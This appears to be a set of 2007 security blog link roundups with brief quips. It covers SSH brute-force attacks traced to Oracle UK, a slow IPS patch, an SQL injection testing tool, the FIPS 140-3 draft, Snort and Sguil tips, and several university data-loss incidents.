It’s Friday the 13th…queue ominous music…but I’m counting on everything going smoothly today. Is it just me or do things always tend to explode on Friday’s?

Here’s the list:

Oracle UK systems accused in ‘SSH hacking spree’ – “Bad Oracle….bad!”

Compromised computers at Oracle UK are listed among the 10 worst offenders on the net for launching attacks on servers which run SSH (secure shell) server software.

Oracle said it is investigating the reported problem, which it is yet to either confirm or refute.
Click here to find out more!

A box (or group of boxes behind a proxy) at Oracle UK is among the worst offenders for launching attacks, according to statistics from servers running DenyHosts software to block SSH brute-force password attacks.

Patching an IPS – 16 months ! – Woah…..

Looking into disclosure timeline [pdf] of Andres Riancho, Cybsec Security Systems the vendor was contacted on 6th February, 2006 already.

The updated TOS version was released on 4th July, 2007, i.e. last week.

I’m not saying 3Com is slow when fixing vulnerabilities, I think this issue was extremely difficult to resolve. Cybsec will “disclose technical details 30 days after publication of pre-advisory”. Let’s wait!

FG-Injector – SQL Injection & Proxy Tool – New tool to test out.

FG-Injector Framework is a set of tools designed to help find SQL injection vulnerabilities in web applications, and help the analyst assess their severity. It includes a powerful proxy feature for intercepting and modifying HTTP requests, and an inference engine for automating SQL injection exploitation.

NIST releases revised FIPS crypto standard for review – Review away my friends….review away!

The latest version of the Federal Information Processing Standard for cryptographic modules, FIPS 140-3, has been released for comment by the National Institute of Standards and Technology.

Comments on the draft, available online at http://csrc.nist.gov/publications/drafts.html#fips140-3 , are due to NIST by Oct. 11.

The current standard, FIPS 140-2, grew out of Federal Standard 1027, General Security Requirements for Equipment, which used the now-outdated Data Encryption Standard. FIPS 140-1 was issued in 1994 with a requirement that it be reviewed every five years. The review and revision process can take several years, and FIPS 140-2 was approved in 2001.

It’s Thursday…one day between me and my precious weekend.

Here’s the list:

Webinar: Cross-Site Request Forgery – Free webinar if you’re interested.

For those interested in learning about Cross-Site Request Forgery (CSRF), WhiteHat is hosting a webinar on July 24, 2007 at 11:00 AM PDT. This is about the basics, in and outs, and solutions in straight forward terms. If you want to attend registration is free.

Secret Military Materials Posted to Unprotected Public Servers – This has “good idea” written all over it.

In the latest government scandal that may make you drop your head in your hands and groan, the Feds have accidentally posted critical information to unsecured public FTP servers — critical as in blueprints, aerial photographs, and geographical surveys that could show Iraqi insurgents entry points and weaknesses at key military sites. The Associated Press published their report this afternoon.
The military may know something about secrecy in the trenches, but next to nothing about security on the Internet. They initially refused to release the information, and then unwittingly posted it online, according to AP:

The military calls it “need-to-know” information that would pose a direct threat to U.S. troops if it were to fall into the hands of terrorists. It’s material so sensitive that officials refused to release the documents when asked.

But it’s already out there, posted carelessly to file servers by government agencies and contractors, accessible to anyone with an Internet connection.

Snort Report 7 Posted – Richard has posted his 7th Snort report. These are always a good read for anyone who uses Snort.

In the last Snort Report we looked at output methods for Snort. These included several ways to write data directly to disk, along with techniques for sending alerts via Syslog and even performing direct database inserts. I recommended not configuring Snort to log directly to a database because Snort is prone to drop packets while performing database inserts. In this edition of the Snort Report I demonstrate how to use unified output, the preferred method for high performance Snort operation.

Fun Intrusion Story – “Major network penetrations of any kind are exceedingly uncommon.” …. HAHAHAHAHAHAH.

Here is an enlightening account of a major intrusion investigation of a cell phone network in Greece.

Tina Bird’s Logs and Law Summary – Good reference material.

Here is the most comprehensive summary of all legal, regulatory, policy and other guidance documents that mention logging, created and maintained by none other than Tina Bird, who seem to be back in logland full time 🙂

Do-It-Yourself Forensics – Exceptionally good article from a legal publication.

All over America, vendors stand ready to solve the e-discovery problems of big, rich companies. But here’s the rub: Most American businesses are small companies that use computers — and along with individual litigants, they’re bound by the same preservation obligations as the Fortune 500, including occasionally needing to preserve forensically significant information on computer hard drives. But what if there’s simply no money to hire an expert, or your client insists that its own IT people must do the job?

Misplaced Class Roster Contained Student Social Security Numbers – Wow….just…..wow.

For the second time in as many months, Texas A&M, Corpus Christi is alerting students over the loss of personal information. This latest incident involved the temporary loss of a class roster containing the names and Social Security numbers of the 49 individuals enrolled in A&M-CC’s Business Law 3310 class. The adjunct professor for the class, Terrell Dahlman, immediately notified School of Business officials and class students when he discovered the roster missing. In an e-mail to students, Dahlman asked each student to check their handouts to see if they accidentally picked up the roster. A student, it turns out, did accidentally pick up the roster and returned the roster to Dhalman during the next class. According to Marshall Collins, vice president for marketing and communications, A&M-CC will not investigate this incident further since the roster was returned. When asked about A&M-CC using Socials Security numbers for identification, Collins replied, “All we have to go by is Social Security numbers. It’s one of the fallacies of the system.”

Busy, busy busy. If only I had more time during the day.

Here’s the list:

Searching inside payload data – Good little SQL statement to hang on to.

Almost all of my searches involve IPs and/or port numbers, and Sguil has a lot of built-in support for these types of database queries, making them very easy to deal with. Sometimes, though, you want to search on something a little more difficult.

This morning, for example, I had a specific URL that was used in some PHP injection attack attempts, and I wanted to find only those alerts that had that URL as part of their data payload.

Constructing a query for this is actually pretty easy, if you use the HEX() and the CONCAT() SQL functions. If you’re using the GUI interface, you only have to construct the WHERE clause, so you can do something like the following…

Explaining Sensitive Information – Unfortunately there is no definitive method for classifying sensitive information. Which begs the question…shouldn’t there be?

Classification of data starts with defining that data. Unfortunately there are many definitions for personal or private information and these definitions are often different depending on country, state, organization, regulation, and other factors.

Network Security Monitoring Case Study – I love case studies!

So this is the major question. How do you convince management or other functional areas that monitoring is important? It sounds to me like my friend has already scored some wins by freeing bandwidth used by misconfigured systems, simplifying firewall rules, and examining individual problematic hosts.

It’s important to remember that there is no return on security investment. Security is a cost center that exists to prevent or reduce loss. It is not financially correct to believe you are “earning” a “return” by spending time and money to avoid a loss.

If I need to spend $1000 to hire a guard to protect my $10000 taxi, I am not earning a return on my investment — I am preventing the theft of my taxi. If I invest that $1000 in a ticketing and GPS system that makes me more productive ferrying passengers (perhaps increasing my dollars per hour worked), then I have enjoyed a ROI once my $1000 expense is covered.

Breach vs. Incident: Semantics or Something More? – Personally, I tend to think that a “breach” is an intrusion outside of policy whereas an “incident” would be the proceeding results of the aforementioned breach (attack a server, obtain sensitive documents, etc.).

What I find so fascinating about this statement is that the distinction between incident and breach and that an “incident” should not be viewed in the same light as a “breach”. So I started thinking, is this distinction merely a semantic issue or are there some underlying assumption amongst the general public that an incident is an everyday, and perhaps less dangerous, occurrence then a breach. One of the words is a simple noun that brings to mind a singular event of some type that may or may not be harmful. The other word is more action oriented and brings to mind, at least to my mind, images of whales bursting through the surface of the water and other dynamic events. Given the very differences in these words, should they be used as interchangeably as they are in the Information Security arena?

Evtx Event Record – Interesting.

This article documents the structure of a single event record within a Vista Event Log (.evtx) file.

The event record starts with a magic string, two asterisks followed by two null bytes. It is framed by matching length indications. They state the whole record’s size, from the magic string to the trailing length indicator. This is similar to the record structure of the old NT event logging service. The length indications at the beginning and at the end of an event record allow the logging service to traverse the chain of records efficiently in both directions.

Laptop Containing UMN Student Information Stolen from Locked Car – Sigh…..

The University of Minnesota is alerting students after a laptop containing student grade information was stolen from a professors car during a trip to Palo Alto. The laptop, belonging Elizabeth Beaumont of the political science department, contained the names, e-mail address, internal University IDs and grades for students enrolled in Beaumont’s classes from fall 2005 until present. While the University has a policy that all non-public information must be encrypted, 70-80% of the political science laptops, including Beaumont’s, have no encryption. The University has plans in place to ensure all political science laptops are encrypted by the end of the summer.